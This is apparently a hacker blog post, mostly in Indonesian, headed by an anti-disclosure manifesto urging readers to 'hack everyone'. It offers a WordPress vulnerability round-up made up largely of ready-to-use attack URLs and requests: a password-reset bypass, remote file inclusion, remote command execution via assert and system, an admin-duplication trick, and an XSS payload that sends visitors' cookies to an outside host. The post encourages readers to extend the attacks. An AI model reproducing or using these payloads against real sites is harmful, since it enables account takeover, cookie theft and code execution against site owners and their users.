_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


Project finished, Wordpress Vulnerability full disclosure

-------------------------------------------------------
| |
| WORDPRESS |
| |
>-----------------------------------------------------< |-----------------------------------------------------|
|[+]Author : ELV1N4 |
|[+]contact : ELV1N@doyan.cc |
|[!]Blog : http://elv1n4.blogspot.com |
|[-]Gretzz : #SolpotCreW,#nyubicrew, |
|#noscan, #hitamputih, cyberdos family |
|-----------------------------------------------------| ------------------------------------------------------- ------------------------------------------------------
-> WORDPRESS <-
------------------------------------------------------

|----------> apa itu WORDPRESS ?
| |
| |
| |
| |-----> Vulnerability On wp-login.php
| |
| |
| |-----> Vunlerabilty On Wp mygallery
| |
| |
| |-----> Vulnerabilty On WP-Syntax
| |
| |
| |-----> Vulnerabilty On plugin by Fredrik Fahlstad.
| |
| |
| |-----> Vulneabilty On templates.php
| |
| |-----> Vulnerabilty On Plugin Sniplets 1.1.2
|
|---------> Penuntup

------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------

------------------------------------------------------
APA itu WORDPRESS ?
------------------------------------------------------
Wordpress adalah salah satu aplikasi atau script berbasis web yang dapat anda gunakan untuk membangun sebuah website atau blog. Wordpress digunakan oleh sebagian besar pengguna web karena instalasinya yang sangat mudah bahkan untuk yang masih pemula sekalipun. Ryan Boren dan Matt Mullenweg adalah tokoh di balik Wordpress. Mereka telah memimpin proyek ini sejak tahun 2004 yang pada waktu itu masih bernama B2 / Cafelog. Kemudian menggunakan nama Wordpress hingga sekarang. Kebanyakan pakar internet marketing sangat menganjurkan untuk menggunakan aplikasi Wordpress ini sebagai basis web, karena kehebatan Wordpress dalam bertarung di Search Engine (mesin pencari) sudah terbukti dan tidak diragukan lagi. Hal lain yang membuat Wordpress ini sangat diminati adalah karena Wordpress ini gratis. Setiap orang dapat menginstall aplikasi Wordpress ini dengan mudah tanpa harus mengeluarkan uang. Disamping itu support sistemnya sangat bagus. Setiap keluhan pengguna ditanggapi dengan cepat dan akurat.tetapi jangan sangka ke indahan Wordpress dapat berubah jadi mimpi buruk :D wadoww . mimpir buruk itu apaan yah heuheue :P .banyaknya ancaman" kaum peretas semakin meningkat , nah itu yang menjadi mimpi buruk para pengguna WP, khususnya pengguna Wp untuk bussines . :D mari kita liat berbagai vulnerabilty dalam Wp ------------------------------------------------------
Vulnerability On wp-login.php
------------------------------------------------------
threat :: Remote admin reset password
threat level :: Medium
Discover :: Laurent Gaffié
Wp Version :: 2.8.3
------------------------------------------------------
var/ww-home/Wp/wp-login.php?action=rp&key=[keyID] itu path untuk mereset password baiklah kita melihat source wp-login.php mungkin ada sedikit kesalahan penulisan script yang akan berakbit fatal
######################################################
case 'resetpass' : case 'rp' : $errors = reset_password($_GET['key']); if ( ! is_wp_error($errors) ) { wp_redirect('wp-login.php?checkemail=newpass'); exit(); } wp_redirect('wp-login.php?action=lostpassword&error=invalidkey'); exit(); break; ######################################################
nah berarti string $key dapat memungkinkan kita reset password tanpa reconfirmasi ^_^ contoh :: var/www-home-wordpress/wp-login.php?action=rp&key[]= nah dalam path diatas bila kita eksekusi , maka password akan ter reset secara otomatis , tanpa comfirmasi apapun ^_^

------------------------------------------------------
Vunlerabilty On Wp mygallery
------------------------------------------------------
threat :: Remote File inclusion ( RFI )
Bugs :: myGallery threat
level :: High
Discover :: GolD_M
Wp Version :: 1.2.1
------------------------------------------------------
beberapa content / plugin pada Wp memang sensitif untuk di injeksikan oleh Serangan Remote , pengulangan barisan (SQLi) , Atau buffer overflow. yu kita liat cara bagaimana terjadinya bugs pada plugin Mygallery pada Wp ######################################################### # #
if (!$_POST){ # $mypath=$_GET['myPath']; <---------[+1] # # } # else { # $mypath=$_POST['myPath'];<---------[+2] # # # } # require_once($mypath.'/wp-config.php');<---------[+3]
##########################################################

karena terjadinya include($page . '.php'); pada /wp-Config.php maka tag dalam Mygallery mempunyai Akses untuk mengluarkan file ( .php ) var/ww-home/wordpress/wp-content/plugin/mygallery/myfunctions/mygallerybrowser.php?myPath= ^eVilscript^ ------------------------------------------------------
Vulnerabilty On WP-Syntax
------------------------------------------------------
threat :: Remote command execution ( RCE )
Bugs :: Wp-syntax
threat level :: High
Discover :: Inj3ct0r
Wp Version :: 0.9.1
------------------------------------------------------
GET /wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0 Host: localhost Cookie: PHPSESSID=dir Connection: close or var/www-home/wordpress/wp-content/index.php?test_filter[wp_head][99][]=session_start&test_filter[wp_head][99][0]=session_id&test_filter[wp_head][99][1]=base64_decode&test_filter[wp_head][99][2]=assert&q=phpinfo();exit; ------------------------------------------------------
Vulnerabilty On plugin by Fredrik Fahlstad. ------------------------------------------------------
threat :: Duplicate Admin / Renew Password
Bugs :: N/a
threat level :: High Risk
Discover :: irk4z ( polandia ) Wp Version :: 2.6.1 ------------------------------------------------------
Pembuatan Duplikasi Admin ?? apa bisa ? caranya -> var/www-home/wordpress/wp-login.php?action=register

-> register dengan nama admin
-> isikan form
login: admin
email: email kamu

-> var/www-home/wordpress/wp-login.php?action=lostpassword

-> tuliskan Email kamu yang tadi

-> check password di email kamu

-> login dengan password yang baru ^_^

------------------------------------------------------
Vulneabilty On templates.php
------------------------------------------------------
threat :: XSS
Bugs :: wp-admin/templates.php
threat level :: Medium
Discover :: My favorite Michael Daw's <3

src="'var/www-home/wordpress/wp-admin/templates.php?file=" src="%27%27" onerror="javascript: var s=(document.location.toString().charAt(6)); var url=(%27http:%27%2Bs%2Bs%2B%27michaeldaw.org%27); document.location=url%2Bs%2B%27evil.php?%27%2Bdocument.cookie">'


=======================================================
var/www-home/wordpress/wp-admin/templates.php?file=%3Cimg%20src=''onerror=javascript:alert(document.cookie);%3E


contoh diatas adalah cookies stealer XSS

kembangkan serangan XSS lain
masih banyak yang lebih sensitif dalam XSS
gunakan cheat sheet XSS lainnya yah

------------------------------------------------------
Vulneabilty On Plugin Sniplets
------------------------------------------------------
threat :: Multiple Vulnerabilty
Bugs :: /modules/syntax_highlight.php
threat level :: Medium
Discover :: N/a
Wp Version :: N/a
------------------------------------------------------

RFI
---

var/www/home/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= ^evilscript^


XSS
----
var/www/home/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

RCE
----

var/www/home/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);


------------------------------------------------------
Penutup
------------------------------------------------------
Masih banyak lagi Bugs" yang terdapat pada Wordpress , ^_^
Hacking its Easy, Secure Its Hard

------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------

Labels:


On 2/25/09 at 11:50 AM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

Project finished, Wordpress Vulnerability full disclosure

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org